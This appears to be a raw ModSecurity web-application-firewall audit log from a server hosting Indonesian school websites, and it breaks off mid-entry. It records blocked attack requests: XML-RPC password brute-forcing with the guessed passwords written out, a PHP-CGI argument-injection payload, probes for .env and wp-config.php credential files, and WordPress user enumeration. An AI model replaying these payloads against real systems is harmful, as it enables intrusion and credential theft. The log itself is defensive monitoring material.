[25/Apr/2025:00:41:28 +0700] aAp3yPiVYlyO1xhz7yPV0QAAAMk 103.236.140.4 58694 103.236.140.4 8181 --193ff947-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --193ff947-C-- wp.getUsersBlogs miswan miswan@2019 --193ff947-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --193ff947-E-- --193ff947-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (125+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516488702719 5452 (- - -) Stopwatch2: 1745516488702719 5452; combined=3984, p1=447, p2=3332, p3=0, p4=0, p5=119, sr=97, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --193ff947-Z-- --ec51c42c-A-- [25/Apr/2025:00:42:28 +0700] aAp4BGLuk3f9kLjsdTaj5QAAAIg 103.236.140.4 35198 103.236.140.4 8181 --ec51c42c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ec51c42c-C-- wp.getUsersBlogs miswan trustno1 --ec51c42c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec51c42c-E-- --ec51c42c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516548192011 6247 (- - -) Stopwatch2: 1745516548192011 6247; combined=4423, p1=562, p2=3690, p3=0, p4=0, p5=102, sr=104, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec51c42c-Z-- --f3ac124f-A-- [25/Apr/2025:00:43:28 +0700] aAp4QPiVYlyO1xhz7yPYkwAAANI 103.236.140.4 40118 103.236.140.4 8181 --f3ac124f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f3ac124f-C-- wp.getUsersBlogs miswan access --f3ac124f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3ac124f-E-- --f3ac124f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (124+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516608038618 5196 (- - -) Stopwatch2: 1745516608038618 5196; combined=3700, p1=452, p2=3056, p3=0, p4=0, p5=111, sr=91, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3ac124f-Z-- --89604a5f-A-- [25/Apr/2025:00:44:28 +0700] aAp4fMlQo524fhbIj1ywhAAAABY 103.236.140.4 44538 103.236.140.4 8181 --89604a5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --89604a5f-C-- wp.getUsersBlogs miswan password12 --89604a5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89604a5f-E-- --89604a5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516668192982 5312 (- - -) Stopwatch2: 1745516668192982 5312; combined=3646, p1=475, p2=3012, p3=0, p4=0, p5=93, sr=92, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89604a5f-Z-- --9bca3c45-A-- [25/Apr/2025:00:45:28 +0700] aAp4uGLuk3f9kLjsdTanPgAAAIY 103.236.140.4 48278 103.236.140.4 8181 --9bca3c45-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9bca3c45-C-- wp.getUsersBlogs miswan administrators --9bca3c45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bca3c45-E-- --9bca3c45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516728104922 4348 (- - -) Stopwatch2: 1745516728104922 4348; combined=3090, p1=410, p2=2532, p3=0, p4=0, p5=90, sr=75, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bca3c45-Z-- --f906fb6b-A-- [25/Apr/2025:00:45:42 +0700] aAp4xt5yz20UX9VrdZPrHAAAAE4 103.236.140.4 48900 103.236.140.4 8181 --f906fb6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f906fb6b-C-- wp.getUsersBlogs miswan 1234%^&* --f906fb6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f906fb6b-E-- --f906fb6b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516742357681 6215 (- - -) Stopwatch2: 1745516742357681 6215; combined=4366, p1=545, p2=3632, p3=0, p4=0, p5=114, sr=91, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f906fb6b-Z-- --0ae11e38-A-- [25/Apr/2025:00:46:28 +0700] aAp49GLuk3f9kLjsdTaoUQAAAIA 103.236.140.4 51746 103.236.140.4 8181 --0ae11e38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0ae11e38-C-- wp.getUsersBlogs miswan sophie --0ae11e38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ae11e38-E-- --0ae11e38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516788166100 4960 (- - -) Stopwatch2: 1745516788166100 4960; combined=3715, p1=452, p2=3085, p3=0, p4=0, p5=104, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ae11e38-Z-- --3ddb4a20-A-- [25/Apr/2025:00:47:28 +0700] aAp5MGLuk3f9kLjsdTapKwAAAIY 103.236.140.4 54768 103.236.140.4 8181 --3ddb4a20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3ddb4a20-C-- wp.getUsersBlogs miswan mother --3ddb4a20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ddb4a20-E-- --3ddb4a20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516848319225 4777 (- - -) Stopwatch2: 1745516848319225 4777; combined=3709, p1=428, p2=3107, p3=0, p4=0, p5=102, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ddb4a20-Z-- --d6e1ad49-A-- [25/Apr/2025:00:48:28 +0700] aAp5bN5yz20UX9VrdZPtsQAAAFA 103.236.140.4 58954 103.236.140.4 8181 --d6e1ad49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d6e1ad49-C-- wp.getUsersBlogs miswan 1g2w3e4r --d6e1ad49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6e1ad49-E-- --d6e1ad49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516908289210 4978 (- - -) Stopwatch2: 1745516908289210 4978; combined=3755, p1=431, p2=3137, p3=0, p4=0, p5=110, sr=88, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6e1ad49-Z-- --21ef3347-A-- [25/Apr/2025:01:31:14 +0700] aAqDcmLuk3f9kLjsdTa-LgAAAIs 103.236.140.4 35196 103.236.140.4 8181 --21ef3347-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --21ef3347-C-- --21ef3347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21ef3347-E-- --21ef3347-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745519474667632 4577 (- - -) Stopwatch2: 1745519474667632 4577; combined=3203, p1=467, p2=2703, p3=0, p4=0, p5=32, sr=63, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21ef3347-Z-- --6ef3ef29-A-- [25/Apr/2025:01:40:44 +0700] aAqFrN5yz20UX9VrdZMGFgAAAEs 103.236.140.4 49642 103.236.140.4 8181 --6ef3ef29-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 46.101.111.185 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6ef3ef29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ef3ef29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745520044087495 739 (- - -) Stopwatch2: 1745520044087495 739; combined=320, p1=267, p2=0, p3=0, p4=0, p5=52, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ef3ef29-Z-- --f5f86442-A-- [25/Apr/2025:02:05:09 +0700] aAqLZclQo524fhbIj1zWfgAAAA0 103.236.140.4 44850 103.236.140.4 8181 --f5f86442-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.160.182.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.160.182.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f5f86442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5f86442-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745521509425365 3272 (- - -) Stopwatch2: 1745521509425365 3272; combined=1432, p1=437, p2=962, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5f86442-Z-- --9a5cdc7a-A-- [25/Apr/2025:02:11:04 +0700] aAqMyMlQo524fhbIj1zXSwAAABA 103.236.140.4 46222 103.236.140.4 8181 --9a5cdc7a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 54.36.61.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 54.36.61.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9a5cdc7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a5cdc7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745521864921252 2859 (- - -) Stopwatch2: 1745521864921252 2859; combined=1279, p1=420, p2=829, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a5cdc7a-Z-- --a809ff1f-A-- [25/Apr/2025:02:32:58 +0700] aAqR6slQo524fhbIj1zYkQAAAA8 103.236.140.4 51448 103.236.140.4 8181 --a809ff1f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.95.35.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.95.35.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a809ff1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a809ff1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745523178032644 2403 (- - -) Stopwatch2: 1745523178032644 2403; combined=1305, p1=399, p2=868, p3=0, p4=0, p5=38, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a809ff1f-Z-- --8cadf627-A-- [25/Apr/2025:02:40:28 +0700] aAqTrMlQo524fhbIj1zY8wAAAAs 103.236.140.4 53324 103.236.140.4 8181 --8cadf627-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.47.25 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 188.166.47.25 Accept-Encoding: gzip X-Varnish: 136635919 --8cadf627-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8cadf627-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745523628683195 804 (- - -) Stopwatch2: 1745523628683195 804; combined=293, p1=258, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cadf627-Z-- --58bbf30c-A-- [25/Apr/2025:02:41:12 +0700] aAqT2MlQo524fhbIj1zZAQAAAAA 103.236.140.4 53588 103.236.140.4 8181 --58bbf30c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.240.2.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.240.2.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --58bbf30c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58bbf30c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745523672341796 2689 (- - -) Stopwatch2: 1745523672341796 2689; combined=1347, p1=459, p2=859, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58bbf30c-Z-- --f2f58752-A-- [25/Apr/2025:02:46:56 +0700] 